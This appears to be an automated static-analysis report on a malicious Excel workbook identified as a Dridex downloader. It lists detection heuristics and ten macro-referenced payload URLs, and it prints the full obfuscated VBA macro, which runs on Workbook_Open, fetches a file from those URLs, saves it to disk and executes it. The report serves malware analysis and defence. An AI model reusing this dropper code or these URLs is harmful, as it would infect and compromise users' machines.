Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 be09dc5a691e4d1b…

MALICIOUS

Office (OOXML)

72.8 KB Created: 2021-04-28 13:29:32 UTC Authoring application: Microsoft Excel 15.0300 First seen: 2021-05-10
MD5: 999059370f5d92d09db3d17ec5793598 SHA-1: 3a5f94921bd3cffc078ead6e1826d1ab6bc5e477 SHA-256: be09dc5a691e4d1b1bfd4d694ae1c9aaeb1e2b2ed9482b5076fe672cdbaba956
238 Risk Score

Heuristics 8

  • ClamAV: Xls.Downloader.DridexDarkGreen1020210-9905041-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Downloader.DridexDarkGreen1020210-9905041-0
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
    missileersstanzas.Write .responseBody
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set sphygmophones_curule_abjectnes = CreateObject(RECONCEPTUALIZESJUMBLINGLYENDP)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    RAZZMATAZZESREDWAREPYROELECTRI = Environ(BISE_ZOOTYPE_UNHEEDFULLY_CLINC.muezzin_compands_modishness(LUMINESCENTTELOSSIXPENCESTACHY))
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://lemaobmx.canalprogramando.com/catalog/language/en-gb/extension/advertise/lTjAkD6Yg9r5fwe.php Referenced by macro
    • https://blackcarplake.hu/wp-includes/js/tinymce/plugins/charmap/QCzXSUvp9F.phpReferenced by macro
    • https://airflower.com.br/images/_notes/GY4BCcEU.phpReferenced by macro
    • https://master-brow.com/wp-content/themes/skt-haircut/images/slides/eSDM9Ov9809tdBW.phpReferenced by macro
    • https://pediatriadrgonzales.com/wp-content/themes/betheme/js/parallax/vrGCm7NkD.phpReferenced by macro
    • https://damascobakery.com/wp-content/plugins/woocommerce/packages/action-scheduler/ZPq8CpDANXT.phpReferenced by macro
    • https://aumm04.compreconsorcioitau.com.br/img/sTuXAaasLJrv.phpReferenced by macro
    • https://inmelayala.iscoprogramacion.com/punto_venta/AdminLTE/plugins/ion-rangeslider/css/DT0BhyLSp.phpReferenced by macro
    • https://itog.in/misc/achro/anchro/TcWUvo3CYQoI.phpReferenced by macro
    • https://vestitofashion.com/wp-includes/js/tinymce/plugins/charmap/faHJ9iO2E3zq6T9.phpReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 11215 bytes
SHA-256: 39559e899b83d4cdf63325103be1b6ff185a260f44d6941bec72f12f487d411a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
IsDate (superabundantmuskeg.DAYLIGHTSECUMENICISMS(REPURCHASESFINGERHOLDSWHITENIN))
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "BISE_ZOOTYPE_UNHEEDFULLY_CLINC"
Function HUGEOUSLYCOLLEMBOLANS(isostasiessaucerfulstebbad)
secludedstigmesaxiomaticallygo = Replace("M:tOc|MSM:tOc|M:tOc|M:tOc|M:tOc|", "M:tOc|", "")
HUGEOUSLYCOLLEMBOLANS = Join(Array(secludedstigmesaxiomaticallygo & Mid("@gRl7F*cRZ;SU<PaXMLk5;LBKpB4Js.8\ex", CLng((-101 - -118)), CLng((-810 - -813))) & Worksheets("BARGANDERPER").Range("CU77") & Worksheets("fetteredscor").Range("ES103") & Replace("f9%!N1f9%!N10f9%!N1f9%!N1f9%!N1", "f9%!N1", "")))
End Function
Function muezzin_compands_modishness(tweezedtossersupaithricdogberr)
unrestfulnesses_soliloquises_b = Mid("tjW1<bqIMZ#c)$wDa^D\cG(hf$ePVSMZl", CLng((xlTable7 Or xlSummaryAbove)), CLng((-532 + 534)))
BLANDNESSESLEGALISEPUNCTILIOOL = Worksheets("BARGANDERPER").Range("BE220")
muezzin_compands_modishness = Join(Array(Mid("$|eH)-x:#<2x:Appz#%F.gTzwc", CLng((-812 + 826)), CLng((xlShowPercent And xlCylinder))) & unrestfulnesses_soliloquises_b & BLANDNESSESLEGALISEPUNCTILIOOL))
End Function

Attribute VB_Name = "SUBAPPEARANCES_MILLIMICRONS"
Function BLENDSCASTRATERCUTCHERRY(rhinencephala_firmnesses_child)
INTONEDRANCIDITIES = Replace(";c(v 0@;c(v 0@;c(v 0@;c(v 0@", ";c(v 0@", "")
MULSHED_THUMBLIKE = Mid("n|WJqNIGVr7R/", CLng((-1.51515151515152E-02 * -528)), CLng((-570 - -571)))
vampired_rais_disinhibiting = Worksheets("CONTRAPUNTIS").Range("BZ182")
stubbornedlightheartednessungo = Worksheets("BARGANDERPER").Range("BX134")
BLENDSCASTRATERCUTCHERRY = MULSHED_THUMBLIKE & vampired_rais_disinhibiting & stubbornedlightheartednessungo & INTONEDRANCIDITIES
End Function
Function packboard_couriers_movelessnes(infallibilism_ethnology_placit)
southboundchloralosedalienated = Mid("GP%XEEUyNrBBQqDBBku.7u(x", CLng((xlPatternGrid And xlTable6)), CLng((Not xlThousands)))
MIMEOEDGYNANDROMORPHICESCAPING = Replace("@iIbELea@iIbEL@iIbEL@iIbEL@iIbEL", "@iIbEL", "")
FORETIME_OVERFREELY_RESELECTED = Replace("2BUxxL.Str2BUxxL2BUxxL2BUxxL", "2BUxxL", "")
packboard_couriers_movelessnes = Worksheets("catalysercri").Range("CX134") & southboundchloralosedalienated & FORETIME_OVERFREELY_RESELECTED & MIMEOEDGYNANDROMORPHICESCAPING & Mid("7S9(H1gpk*-hm-ov;x", CLng((Not -14)), CLng((xlValidAlertStop And xlSummaryBelow)))
End Function

Attribute VB_Name = "androcentrismsmisdatingattunem"
Function alluvia_marbled_sindons_dramat(BANDYINGS_PLASTIDS_OOTHECA_SCO)
DAIRY_BOYGS_TINTOOKIE_CHIRONOM = Replace("LPLGni0LPLGni0LPLGni0LPLGni0ip", "LPLGni0", "")
RECENTRIFUGE_PRESENSIONS_PEDOC = Mid(";+I##@)5KcO^\W7ri#DJ&,kAr%_c$2Ur", CLng((-974 + 990)), CLng((-816 + 817)))
UNPREPOSSESSING_SOOTH_BENEFACT = Mid("P()k5Wu5>k1dO,Y*6&", CLng((xlGreaterEqual Xor xlClipboardFormatVALU)), CLng((0# * 680)))
chartreuses_corporealities = Mid("456x=HeNVPkJEn7ellwU=P+8,%65h22-", CLng((xlKatakanaHalf Or xlLocalFormat2)), CLng((xlSheetVeryHidden Xor xlBelow)))
PHALANGISTS_PEEVISHNESS = Mid("_qKn,Vd7 DwIS@Rtt.ShHLC9@r", CLng((0.303571428571429 * xl3DColumnStacked100)), CLng((1.03626943005181E-02 * xlDialogWorkbookName)))
alluvia_marbled_sindons_dramat = Join(Array(Worksheets("catalysercri").Range("FT143") & RECENTRIFUGE_PRESENSIONS_PEDOC & DAIRY_BOYGS_TINTOOKIE_CHIRONOM & PHALANGISTS_PEEVISHNESS & chartreuses_corporealities & UNPREPOSSESSING_SOOTH_BENEFACT))
End Function

Attribute VB_Name = "QUERISTTWEEDIERSTATURESPRIGHTI"
Function outperforms_brevetted_plessime(CHOCOLATEBELEAPKINDERGARTENS)
zincifiedtriphylitessuffices = Worksheets("BARGANDERPER").Range("CM150")
outperforms_brevetted_plessime = Join(Array(Worksheets("fetteredscor").Range("GC142") & Replace("L)0p*2Vll32.eL)0p*2VL)0p*2V", "L)0p*2V", "") & zincifiedtriphylitessuffices & Mid("iy6^!5)0>:Nee%ZhuTP1ifKP4", CLng((140 + -127)), CLng((xlSaveChanges Xor xlSourceWorkbook)))))
End Function
Function esotericacontortionatecounterb(ULTRAREALIST_SIGHS_MOLLY_MADRA)
PERGUNNAHS_STUPEFACTIVE = Replace("YZBQbrkYZBQbrkYZBQbrkYZBQbrkddYZBQbrk", "YZBQbrk", "")
dehumanisationgarron = Mid("n@7Bmh%GT|L3\)y", CLng((xlTrendline Xor xlRowThenColumn)), CLng((635 + -635)))
CRAZEINTERLACESMAILABILITIESDJ = Worksheets("fetteredscor").Range("BH237")
esotericacontortionatecounterb = CRAZEINTERLACESMAILABILITIESDJ & PERGUNNAHS_STUPEFACTIVE & Worksheets("CONTRAPUNTIS").Range("CL153") & Worksheets("CONTRAPUNTIS").Range("IK206") & dehumanisationgarron
End Function

Attribute VB_Name = "HOWFFED_MAJORAT_DARKFIELD"
Function astrapophobiasunstopperedremou(decompressors_retroreflective_)
PAYSAGES_MULTIDISCIPLINARY_ENF = Worksheets("pantoufles_i").Range("DT192")
emblazed_cicisbeo_niftiness_ac = Mid("Om(n7dllm/$Gj%O", CLng((xlHGL Or xlFrontEnd)), CLng((xlStackScale And xlStackScale)))
astrapophobiasunstopperedremou = Mid("ea*IC!\6:Rw$m", CLng((xlTable9 - xlRangeValueXMLSpreadsheet)), CLng((-12 + xlRangeAutoFormat3DEffects2))) & Mid("Unacp(YjxIX7692.y(W9$", CLng((-0.857142857142857 * -14)), CLng((xlAllExceptBorders And xlPasteSpecialOperationDivide))) & PAYSAGES_MULTIDISCIPLINARY_ENF & emblazed_cicisbeo_niftiness_ac
End Function
Function CULTIVATE_PSYCHICIST(INTERCOOLERS_PERIDOTITE_SLIPRA)
bumph_pseudopregnancies_deforc = Mid("Jj-ZRo#ERp\%;xK", CLng((xlLinkStatusSourceNotOpen Xor xlParamTypeUnknown)), CLng((xlDifferenceFrom And xlEndSides)))
particularities_antimechanists = Mid("wHij&>BS5u<QT2t1Wpb", CLng((294 - 287)), CLng((xlDays Or xlCellValue)))
LYNCHETS_INELUCTABILITIES_PSAL = Worksheets("BARGANDERPER").Range("FF115")
CONDOMINIUM_FLAUNTY = Worksheets("pantoufles_i").Range("DX139")
CULTIVATE_PSYCHICIST = particularities_antimechanists & CONDOMINIUM_FLAUNTY & LYNCHETS_INELUCTABILITIES_PSAL & bumph_pseudopregnancies_deforc
End Function

Attribute VB_Name = "visitee_misfeeds"
Function communalised_atomises_reviser(FLUNITRAZEPAMSQUATTEST)
melik_cataplastic_potassa = Worksheets("fetteredscor").Range("AV253")
immortalised_gulden = Mid("xT^640:IK%55|:%ibxOc7!RA", CLng((xlScreenSize Xor xlListDataTypeChoiceMulti)), CLng((-62 + xlLineMarkers)))
submatrixes_shmoosing_rejoined = Mid("zMRzR6q3Kcks!Ox", CLng((xlFillWeekdays Or xlIMEModeKatakanaHalf)), CLng((-515 - -516)))
PODCASTERSREVENGEFULLY = Replace("8S-UE,R8S-UE,RIP258S-UE,R8S-UE,R", "8S-UE,R", "")
communalised_atomises_reviser = Join(Array(PODCASTERSREVENGEFULLY & immortalised_gulden & Worksheets("CONTRAPUNTIS").Range("BP102") & melik_cataplastic_potassa & submatrixes_shmoosing_rejoined))
End Function

Attribute VB_Name = "ankylose_forhaile_guarding_car"
Function RAZZMATAZZESREDWAREPYROELECTRI()
RAZZMATAZZESREDWAREPYROELECTRI = Environ(BISE_ZOOTYPE_UNHEEDFULLY_CLINC.muezzin_compands_modishness(LUMINESCENTTELOSSIXPENCESTACHY))
End Function

Attribute VB_Name = "tremblingsabrogatorsmisbeseemi"
Function meritocraciesoverratedphalanst()
    meritocraciesoverratedphalanst = QUERISTTWEEDIERSTATURESPRIGHTI.outperforms_brevetted_plessime(anthomaniacs_leatheriest) & Chr(CLng((-926 + 958))) & Chr(CLng((xlXMLSpreadsheet And xlRangeAutoFormatTable3))) & ankylose_forhaile_guarding_car.RAZZMATAZZESREDWAREPYROELECTRI() & HOWFFED_MAJORAT_DARKFIELD.astrapophobiasunstopperedremou(TOPLININGSTELLITE) & Chr(CLng((947 + -913))) & " " & QUERISTTWEEDIERSTATURESPRIGHTI.esotericacontortionatecounterb(VISARDTENTINGSFIVEPENCE)
End Function

Attribute VB_Name = "NONPAGANSCORDILLERA"
Function sphygmophones_curule_abjectnes(RECONCEPTUALIZESJUMBLINGLYENDP)
    Set sphygmophones_curule_abjectnes = CreateObject(RECONCEPTUALIZESJUMBLINGLYENDP)
End Function

Attribute VB_Name = "superabundantmuskeg"
Function DAYLIGHTSECUMENICISMS(INARMS_CLASSIFIC_INSANENESS_CR)
Set missileersstanzas = NONPAGANSCORDILLERA.sphygmophones_curule_abjectnes(SUBAPPEARANCES_MILLIMICRONS.packboard_couriers_movelessnes(MATFELLON_JUPON_METHAMPHETAMIN))
Set myology_italianizing_dialing_c = NONPAGANSCORDILLERA.sphygmophones_curule_abjectnes(BISE_ZOOTYPE_UNHEEDFULLY_CLINC.HUGEOUSLYCOLLEMBOLANS(convalescing_zincographers))
Set GLOBSCOXCOMBICALITY = NONPAGANSCORDILLERA.sphygmophones_curule_abjectnes(androcentrismsmisdatingattunem.alluvia_marbled_sindons_dramat(stend_embryo_meshworks_eternal))
For Each NORMALCIESECCENTRICCHASTISERSB In Worksheets(HOWFFED_MAJORAT_DARKFIELD.CULTIVATE_PSYCHICIST(SOUGHINGDUENNASHIPSBEMIXESSUBC)).Range(visitee_misfeeds.communalised_atomises_reviser(MEINIES_NONTROPICAL))
If Len(NORMALCIESECCENTRICCHASTISERSB.Value) > CLng((Not xlParamTypeLongVarBinary)) Then
With myology_italianizing_dialing_c
.Open SUBAPPEARANCES_MILLIMICRONS.BLENDSCASTRATERCUTCHERRY(flams_phytotomists_tang_phycoc), NORMALCIESECCENTRICCHASTISERSB.Value, False
.Send
If .Status = CLng((253 And xlDialogFillGroup)) Then
missileersstanzas.Open
SCPkn21R4SSQ = Cos(-640)
missileersstanzas.Type = CLng((xlDialogOptionsCalculation + -317))
TbvBmSoao9Fcr = InStr(TbA8koJpyTAs, QMKReLt, KaY4oqt_WyjzF0)
missileersstanzas.Write .responseBody
Debug.Print fLkr7S
missileersstanzas.SaveToFile ankylose_forhaile_guarding_car.RAZZMATAZZESREDWAREPYROELECTRI() & HOWFFED_MAJORAT_DARKFIELD.astrapophobiasunstopperedremou(TOPLININGSTELLITE), CLng((2.64550264550265E-03 * 756))
missileersstanzas.Close
With GLOBSCOXCOMBICALITY
.Run tremblingsabrogatorsmisbeseemi.meritocraciesoverratedphalanst
End With
Exit For
End If
End With
End If
fenagled_twitch_peripatus:
Next NORMALCIESECCENTRICCHASTISERSB
End Function
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 62976 bytes
SHA-256: e6e01ddd90faa59ca590ce8285d5b599f1d132c8c8621fd554897bdc0eee1086

Open this report in the interactive analyzer, or submit your own file for analysis.